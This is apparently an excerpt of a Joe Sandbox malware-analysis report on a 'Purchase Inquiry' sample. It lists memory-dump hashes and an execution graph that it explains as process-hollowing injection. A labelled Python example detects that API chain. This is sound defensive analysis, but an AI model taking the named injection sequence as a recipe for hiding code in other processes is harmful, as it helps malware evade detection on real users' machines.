                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3cee71f7ddfdbf1b2981850de47b802706412db0bc64a95f0f343cd83b08190f
                                • Instruction ID: b8a831b9ca434f2b91dfdb358d2a13c4e790f8465652b90b6094414cf77ae63d
                                • Opcode Fuzzy Hash: 3cee71f7ddfdbf1b2981850de47b802706412db0bc64a95f0f343cd83b08190f
                                • Instruction Fuzzy Hash: 89111275F002098FDB94FBA998156EEBBB6BB88310B504479C515E7340EF359E05CBE1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340300848.000000000260D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0260D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_260d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                • Instruction ID: f7bcb2992856ead8a414bf23a4cd55d588cdcf3e9864c9e3d0822fcb8f1b5783
                                • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                • Instruction Fuzzy Hash: 80110376404240DFCB1ACF40D5C0B16BF71FB84324F24C2A9D8090B796C33AE456DBA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e644d364d7ba1d5f7e2bd91fd049c5bda5be619f81eef0f6656e04bf0429d6d0
                                • Instruction ID: 334d9e866d5828a78eb254b3cb8136f64f5669058b1af90a9aa7bd12557864a0
                                • Opcode Fuzzy Hash: e644d364d7ba1d5f7e2bd91fd049c5bda5be619f81eef0f6656e04bf0429d6d0
                                • Instruction Fuzzy Hash: 6721D3B59043499FDB20DF9AD888BDEBBF5FB48310F108419E919A7210C375A954CFA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340769432.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_261d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode Fuzzy Hash: 69d5ddb3f276bd75f68bc62d5814f57a811c260f23ceb3953edf016052be12d0
                                • Instruction Fuzzy Hash: 08E08C76C010249B8B10ABA4AA065EFFE35AB04610B404412A815A7A00D3300675CBD1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e379b4a446b203ba9316f2e4ebb24f774af1c7b7b0605ba8530a284b05035694
                                • Instruction ID: 932da8f22ae713cb36fd43dd79110e8cceb318cc0b96f268dfe9c748411ddc1d
                                • Opcode Fuzzy Hash: e379b4a446b203ba9316f2e4ebb24f774af1c7b7b0605ba8530a284b05035694
                                • Instruction Fuzzy Hash: C3E08230801209AFCB81FFA4D8086AEBBF8EB05200F5245A8D809A3240EB704A48DB92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80b465bc1d6c212b06fbe5e1c179164d46ec5c03971f5d2917c8fd8ec2a85df8
                                • Instruction ID: ac0eb712d0c8fea4fb1e3088de941b18d9c4e06ee17468609345acc76b8dcb68
                                • Opcode Fuzzy Hash: 80b465bc1d6c212b06fbe5e1c179164d46ec5c03971f5d2917c8fd8ec2a85df8
                                • Instruction Fuzzy Hash: 8BE0B6B0D4420AEFD780EFB9CA09A5EBBF1BF08200F5185A9D019E7251E7B49A04DF91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1ff2969b2516cc10a43d5c203575061c94ca2b7ed5d214ed69cd9cdf81fdf25
                                • Instruction ID: 27538c1c0e917c0b0d33f929a1f42a9b4ddb12a9893079f318b2633037507258
                                • Opcode Fuzzy Hash: a1ff2969b2516cc10a43d5c203575061c94ca2b7ed5d214ed69cd9cdf81fdf25
                                • Instruction Fuzzy Hash: 95D012750561802EE38276118C1ECF23F6DDB6314474584D3E880C94B2890449259B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction ID: e02715d18e688a1892092ab0d202e2642f24cca7c7d57653f56bc025f6609dfd
                                • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction Fuzzy Hash: CED09272D00139AB8B10AFE9EC098EFFF79EF19A50B418126E955AB100E3715A21DBD1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c190058bf93d816394f22bb1e9fbf55b27b7062a5cf89f2915158dabbd9d3358
                                • Instruction ID: e6f4487e8f8d4b7819e62541ffa84e3581dcd92d28e8623c841b7502a34764dd
                                • Opcode Fuzzy Hash: c190058bf93d816394f22bb1e9fbf55b27b7062a5cf89f2915158dabbd9d3358
                                • Instruction Fuzzy Hash: C4D05E3091520CCFDB50DB00E8407D8B77AFB85210F0091D9E04D93200CB701E998F51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7814ace514b199e45e8eec5b6e2b329a69128980ced6b1bd769db61aba5c78b
                                • Instruction ID: a213f3414d282b06fdccc5a2a4940dc8a344b3fd137f81198189ea19ab38a184
                                • Opcode Fuzzy Hash: b7814ace514b199e45e8eec5b6e2b329a69128980ced6b1bd769db61aba5c78b
                                • Instruction Fuzzy Hash: 0FD012371101089E4BC0FFD5EC44C5777DDFB587007408422E504CB130E621E424E7A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d2cc3ff881f3c1720f13435a5a311905a5d8307de4106acfec270ff966a5796
                                • Instruction ID: 28d304f1d5413e20e9e98597b8659878d601d72e4e71f67711a030f3f0bd4414
                                • Opcode Fuzzy Hash: 7d2cc3ff881f3c1720f13435a5a311905a5d8307de4106acfec270ff966a5796
                                • Instruction Fuzzy Hash: ACD0A9310093898FD322AB66B40DA207F787B0A202F0850AAE189CA063DEE84824CB02
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6b9459feb87abe7204e3621c196669d48423a4c2a907bc87153e4e99317fb99
                                • Instruction ID: a7699ccff2a8f61d1fbe797daf7c194697f32bcca3f065387e27143aa18d9e93
                                • Opcode Fuzzy Hash: c6b9459feb87abe7204e3621c196669d48423a4c2a907bc87153e4e99317fb99
                                • Instruction Fuzzy Hash: 96C08C3101120D8BC2603B9BF40EB247BBC7B40302F405025F10D454108FB00410CE5A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd3becf35ed56c796f894449ee43cfb96dca9f55373f0da8b8bc207839d6e11d
                                • Instruction ID: e26ab6739bdcef9e311ac9966037f17ba2af954704a0e527aa2dd61833c532cc
                                • Opcode Fuzzy Hash: bd3becf35ed56c796f894449ee43cfb96dca9f55373f0da8b8bc207839d6e11d
                                • Instruction Fuzzy Hash: 73A012F356000066A084B0208C42AA50E0882F13143544001662110481C64042218073
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd88c61682c2dc19254b806646a2803c59d3ae587eb839795b0f5fb2cbf74697
                                • Instruction ID: 46cb1855d7fed52feea765c20026f8d8bdfca8d105f685bd9673a9c50aa346ea
                                • Opcode Fuzzy Hash: bd88c61682c2dc19254b806646a2803c59d3ae587eb839795b0f5fb2cbf74697
                                • Instruction Fuzzy Hash: C2B012B9169200BFA1D073F45C99B2FD831EBB2B50BA0CC0532A90100085E18464D37B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: a#k;
                                • API String ID: 0-2950163595
                                • Opcode ID: 688edb9fc82dfac584e5663620bd4c3e983e46c806487062678694c11cb443be
                                • Instruction ID: c419e23967347f9156ecba12830c4aefa361a5b6bd881d5cccc3d87d8101b919
                                • Opcode Fuzzy Hash: 688edb9fc82dfac584e5663620bd4c3e983e46c806487062678694c11cb443be
                                • Instruction Fuzzy Hash: F3E1F974E002198FDB54DFA9C584AAEFBF2FF89304F248169E415AB355D730A942CF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8bfd4b553edba7f933a33ba3e82fe2ea2e9dac24fda906f7a8bc398eb3dfdee6
                                • Instruction ID: ada59e8081867b3fc85a69c250d3cc8e90cc9b09735868b230e691378ea37087
                                • Opcode Fuzzy Hash: 8bfd4b553edba7f933a33ba3e82fe2ea2e9dac24fda906f7a8bc398eb3dfdee6
                                • Instruction Fuzzy Hash: 87E1FA74E002198FDB54DFA9D580AAEFBF2BF89304F248169E455AB355D730AD81CFA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c7330ecd09637a5d7bb7205b9f0792b142bda3fe4cac8ccbf01cd91b7c6af1a
                                • Instruction ID: 1c95a16bad1b42b2cb807a11c5c2bb7c57ff22971179eceb7ccafb7e5ab5b135
                                • Opcode Fuzzy Hash: 1c7330ecd09637a5d7bb7205b9f0792b142bda3fe4cac8ccbf01cd91b7c6af1a
                                • Instruction Fuzzy Hash: 81E1FBB4E002198FDB54DFA9C584AAEFBF2FF89304F248169E455AB355D730A941CFA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d49e6b8c3d4603e40d6e55fcce154ce2360ccdcb839829dc3d836ed815f1410f
                                • Instruction ID: 471221ccb427f6e7c68e5ca9a60d616438cc88274a5ff397be52c2659c2f65a5
                                • Opcode Fuzzy Hash: d49e6b8c3d4603e40d6e55fcce154ce2360ccdcb839829dc3d836ed815f1410f
                                • Instruction Fuzzy Hash: 51E10B74E002198FDB54DFA9C584AAEFBF2FF89304F2481A9E455AB355D7309942CFA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 241e0937800b21eb9ff3837ac31a36ae1ca56d225ac564875a1a98e1cb441ba8
                                • Instruction ID: fdb813cb8ae551ca52cf2af356b62df0edcccdde50ed1e1966013a6a72e6dd7b
                                • Opcode Fuzzy Hash: 241e0937800b21eb9ff3837ac31a36ae1ca56d225ac564875a1a98e1cb441ba8
                                • Instruction Fuzzy Hash: B1E1E735D21A5ACACB10EB64D990A9DB7B1FF95300F60CB9AD04937214EF706AD4CF91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01b5e00aeba0deadf8d10ea9c8aaff7016d0330944d003048b680aa29b1b193c
                                • Instruction ID: fb8acf763f7cfa4d8672ec19c9f3301b8b98e06ccd71205e5ffd01e9cca376ea
                                • Opcode Fuzzy Hash: 01b5e00aeba0deadf8d10ea9c8aaff7016d0330944d003048b680aa29b1b193c
                                • Instruction Fuzzy Hash: 95A15C3AE003198FCF05DFA8C84059EB7BAFF95304B15856AE905EB2A1DB71E946CB40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f09ebac308b4db2198e43d92afb8aa5bece906db60d502ac8e8741e06c68666a
                                • Instruction ID: 707820e9957bacfb3f4c44195a8c92dd10f2562be6776212b8c898318155daca
                                • Opcode Fuzzy Hash: f09ebac308b4db2198e43d92afb8aa5bece906db60d502ac8e8741e06c68666a
                                • Instruction Fuzzy Hash: F8D1C735D21A5ACACB10EB64D990A99B7B1FF95300F60CB9AD04A37214FF706AD4CF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea6a3bc50f1f0e9ef2186d07a297ed1b6c008c2fe99ea912a16fd47b0d60b77c
                                • Instruction ID: 690d02b4155e6564c4848c4e128cf59d9bf496d63a6143bdf5d317e4da211af4
                                • Opcode Fuzzy Hash: ea6a3bc50f1f0e9ef2186d07a297ed1b6c008c2fe99ea912a16fd47b0d60b77c
                                • Instruction Fuzzy Hash: 7741E674D04208CFDB48DFAAD8496AEBBF6EB8D301F14D06AE459AB251DB344941CF94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbbb68d6728b3c01ce3e250d8755605ab4c5d59bec9f4f6a9c8fae53557e5cbc
                                • Instruction ID: 12bd1ffeb4027a0d8c9b15a16a4fd56cd5009a2a5c57974bae43082ff29e6c4f
                                • Opcode Fuzzy Hash: cbbb68d6728b3c01ce3e250d8755605ab4c5d59bec9f4f6a9c8fae53557e5cbc
                                • Instruction Fuzzy Hash: 3641B9B1E016189FEB68DF6AC8447DABAF3AFC9200F15C1A9D40CA7254EB309981CF51

                                Execution Graph

                                Execution Coverage:10.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:199
                                Total number of Limit Nodes:6
                                 execution_graph (rendered call graph; the raw node and edge dump is not reproduced here, only the API calls it resolves)
                                 • Entry node 742181a reaches a dispatcher (74233f6 / 7423398 / 7423388) whose branches (7423797, 7423b5a, 7423a42, 7423d3f, 7423939, 7423a04 and their siblings) each wrap one injection API:
                                 • 7421359 / 74214be: CreateProcessA
                                 • 7420f88 / 7420fc8: VirtualAllocEx
                                 • 7421048 / 7421090: WriteProcessMemory
                                 • 7421183: ReadProcessMemory
                                 • 7420ef5 / 7420eb0: Wow64SetThreadContext
                                 • 7420e40 / 7420e00: ResumeThread
                                 Taken together this is the CreateProcess, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread sequence of process hollowing (RunPE), which is what the "Injects a PE file into a foreign processes" signature reflects; the Wow64 variant of SetThreadContext is the one resolved here.
                                 • Other API nodes in the graph: 7424800 PostMessageW; 13e5918 / 13e44b4 CreateActCtxA; 13eafa0 GetModuleHandleW; 13ed650 DuplicateHandle; 13ed046 and 13ed0d5 GetCurrentProcess; 13ed098 GetCurrentThread; 13ed133 GetCurrentThreadId.
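The execution graph above is emitted as a flat token stream (node id, address, optional API annotation, and id->id edges). The following script is an added example, not part of the Joe Sandbox report or its tooling: it parses that stream, walks each entry node's reachable call tree, and flags any entry whose tree covers the full process-hollowing API set. The embedded sample is a hand-copied excerpt of this report's own graph (the node and edge tokens for entry 742181a and the DuplicateHandle node); the token grammar, the Node/Graph classes and the HOLLOWING_APIS set are this example's assumptions.

```python
"""Parse a Joe Sandbox execution-graph dump and flag process-hollowing API chains.

Assumed token grammar (inferred from the dump, not a documented format):
  <node-id> <address> [annotation ...]   node definition, e.g. "29902 7421048 WriteProcessMemory"
  <node-id>-><node-id>                   directed edge,    e.g. "29901->29902"
An annotation is either a Win32 API name or a summary such as "2 API calls".
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

HEX_ADDR = re.compile(r"[0-9a-f]{6,8}")
API_NAME = re.compile(r"[A-Z][A-Za-z0-9]+")   # Win32 exports are CamelCase

# APIs that together implement process hollowing (RunPE); assumption of this example.
HOLLOWING_APIS = frozenset({
    "CreateProcessA", "VirtualAllocEx", "WriteProcessMemory",
    "Wow64SetThreadContext", "ResumeThread",
})


@dataclass
class Node:
    addr: str
    apis: set = field(default_factory=set)


@dataclass
class Graph:
    nodes: dict = field(default_factory=dict)                      # node id -> Node
    edges: dict = field(default_factory=lambda: defaultdict(set))  # src id -> {dst id}
    indegree: dict = field(default_factory=lambda: defaultdict(int))


def _is_node_start(tokens, i):
    """A five-digit id followed by a hex address opens a node definition."""
    return (tokens[i].isdigit() and len(tokens[i]) == 5
            and i + 1 < len(tokens) and HEX_ADDR.fullmatch(tokens[i + 1]) is not None)


def parse_execution_graph(text):
    tokens = text.split()
    g = Graph()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->", 1)
            g.edges[src].add(dst)
            g.indegree[dst] += 1
            i += 1
        elif _is_node_start(tokens, i):
            node = g.nodes.setdefault(tok, Node(tokens[i + 1]))
            i += 2
            # Consume annotation tokens up to the next edge or node definition.
            while i < len(tokens) and "->" not in tokens[i] and not _is_node_start(tokens, i):
                ann = tokens[i]
                if ann != "API" and API_NAME.fullmatch(ann):   # drop "2 API calls" summaries
                    node.apis.add(ann)
                i += 1
        else:
            i += 1   # stray token such as the "execution_graph" label
    return g


def reachable_apis(g, root):
    """Union of API annotations on every node reachable from `root`."""
    seen, stack, apis = set(), [root], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        if n in g.nodes:
            apis |= g.nodes[n].apis
        stack.extend(g.edges.get(n, ()))
    return apis


def find_hollowing_chains(g, required=HOLLOWING_APIS):
    """Return {entry address: sorted reachable APIs} for entry nodes covering `required`."""
    hits = {}
    for node_id, node in g.nodes.items():
        if g.indegree.get(node_id, 0) == 0:
            apis = reachable_apis(g, node_id)
            if required <= apis:
                hits[node.addr] = sorted(apis)
    return hits


# Constructed excerpt of this report's execution graph (tokens copied from the dump;
# the full graph has 199 nodes).
SAMPLE_GRAPH = """
execution_graph 29752 742181a 29753 7421804 29752->29753 29754 7421814 29752->29754
29753->29754 29758 74233f6 29753->29758 29779 7423398 29753->29779 29759 7423384 29758->29759
29819 7423a42 29759->29819 29824 7423d3f 29759->29824 29829 7423939 29759->29829
29844 7423b5a 29759->29844 29864 7423797 29759->29864 29887 7423a04 29759->29887
29780 74233b2 29779->29780 29781 7423a42 2 API calls 29780->29781
29820 74237f8 29819->29820 29901 7421040 29820->29901 29902 7421048 WriteProcessMemory 29901->29902
29825 7424078 29824->29825 29909 7420eb0 29825->29909 29910 7420ef5 Wow64SetThreadContext 29909->29910
29830 7423943 29829->29830 29917 7420e00 29830->29917 29918 7420e40 ResumeThread 29917->29918
29845 7423b60 29844->29845 29925 7420f80 29845->29925 29926 7420f88 VirtualAllocEx 29925->29926
29933 74212d0 29864->29933 29934 7421359 CreateProcessA 29933->29934
29941 7421131 29887->29941 29942 7421183 ReadProcessMemory 29941->29942
29949 13ed650 DuplicateHandle 29950 13ed6e6 29949->29950
"""

if __name__ == "__main__":
    graph = parse_execution_graph(SAMPLE_GRAPH)
    for entry, apis in find_hollowing_chains(graph).items():
        print(f"entry {entry}: hollowing chain via {', '.join(apis)}")
```

Run as-is it reports entry 742181a with CreateProcessA, ReadProcessMemory, ResumeThread, VirtualAllocEx, Wow64SetThreadContext and WriteProcessMemory reachable, while the DuplicateHandle entry at 13ed650 is not flagged. Matching on reachability from an entry rather than on the presence of the APIs anywhere in the binary is the point: a .NET loader that merely imports these names is common, but one entry point that strings all five together is the injection routine.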

                                Control-flow Graph

                                 control_flow_graph for the function at 73534b8 (rendered graph with executed and not-executed basic blocks; the block and edge list is not reproduced)
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID: :$~
                                • API String ID: 0-2431124681
                                • Opcode ID: 50e5bfa454e1a6a586920cc71929814ab40a1514dd2e82c46bfc2eb8ea37a1b6
                                • Instruction ID: 7782783f6be60c71e6143a099fdca723663fe4e3821c70bd709b46cf3a77fc47
                                • Opcode Fuzzy Hash: 50e5bfa454e1a6a586920cc71929814ab40a1514dd2e82c46bfc2eb8ea37a1b6
                                • Instruction Fuzzy Hash: 4A4204B5A00218DFEB15CF69C984F99BBB2FF49304F1580E9E909AB261D7319D91DF00

                                Control-flow Graph (figure omitted)
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID: D
                                • API String ID: 0-2746444292
                                • Opcode ID: 1cf0c116823de3d9de64a68fc1bbf8c8f03f7f3c8ce13df7fcf6382886d9eb3f
                                • Instruction ID: cbab8dc431995456f88893e3f9d4da26008530c8be03ddb7eef023358950bf12
                                • Opcode Fuzzy Hash: 1cf0c116823de3d9de64a68fc1bbf8c8f03f7f3c8ce13df7fcf6382886d9eb3f
                                • Instruction Fuzzy Hash: 9D52D774A112298FDB64DF64D998BAEBBB2FF89311F1041D9D50AA7350CB30AE81CF51

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 013ED07E
                                • GetCurrentThread.KERNEL32 ref: 013ED0BB
                                • GetCurrentProcess.KERNEL32 ref: 013ED0F8
                                • GetCurrentThreadId.KERNEL32 ref: 013ED151
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: c14f95bdccea853609ac53197794d059728d7b9472e64f83933643dc804236ff
                                • Instruction ID: 3223dd9d6dbba5f4c99f24e5598378a067339aa09738cc4b37fcfcfede9b2de4
                                • Opcode Fuzzy Hash: c14f95bdccea853609ac53197794d059728d7b9472e64f83933643dc804236ff
                                • Instruction Fuzzy Hash: 3A5165B49003498FEB18CFAAD548BEEBBF1EF48304F248469D419A73A1D7749884CB65

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 013ED07E
                                • GetCurrentThread.KERNEL32 ref: 013ED0BB
                                • GetCurrentProcess.KERNEL32 ref: 013ED0F8
                                • GetCurrentThreadId.KERNEL32 ref: 013ED151
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 827e68d12a0597280948f3f1f2353af0337020f738479ae22b10b955dd3dc0c7
                                • Instruction ID: b8ca05fc01e6efdeac4098f5bac85df889082a1be9f74041faf10cfcfe58b4f4
                                • Opcode Fuzzy Hash: 827e68d12a0597280948f3f1f2353af0337020f738479ae22b10b955dd3dc0c7
                                • Instruction Fuzzy Hash: 015156B4D003098FEB14CFAAD548BEEBBF1EF88314F248469D419A73A0D7749984CB65

                                Control-flow Graph (figure omitted)
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07421506
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: cfa08e26aa43c1652a551e2f7c2c0091df7fc3795e97ceb379ca63676e7a4809
                                • Instruction ID: f6542cc381507b2af33ca966e1e7880a7998dbad4b0a4124cd97019800971cbb
                                • Opcode Fuzzy Hash: cfa08e26aa43c1652a551e2f7c2c0091df7fc3795e97ceb379ca63676e7a4809
                                • Instruction Fuzzy Hash: D6A14DB1D0062EDFEB10CF68C841BDEBAB2AF44310F5585AAD809A7240DB749996DF91

                                Control-flow Graph (figure omitted)
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07421506
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 6deeb81b0c9b6723a6dab5667c40f600bfc3e874c5761e806adbf84e65b37b2e
                                • Instruction ID: e8cd44d8f6a3019b036d5af4ceb51433f9fda22eb7e234671910d982c9b43a3f
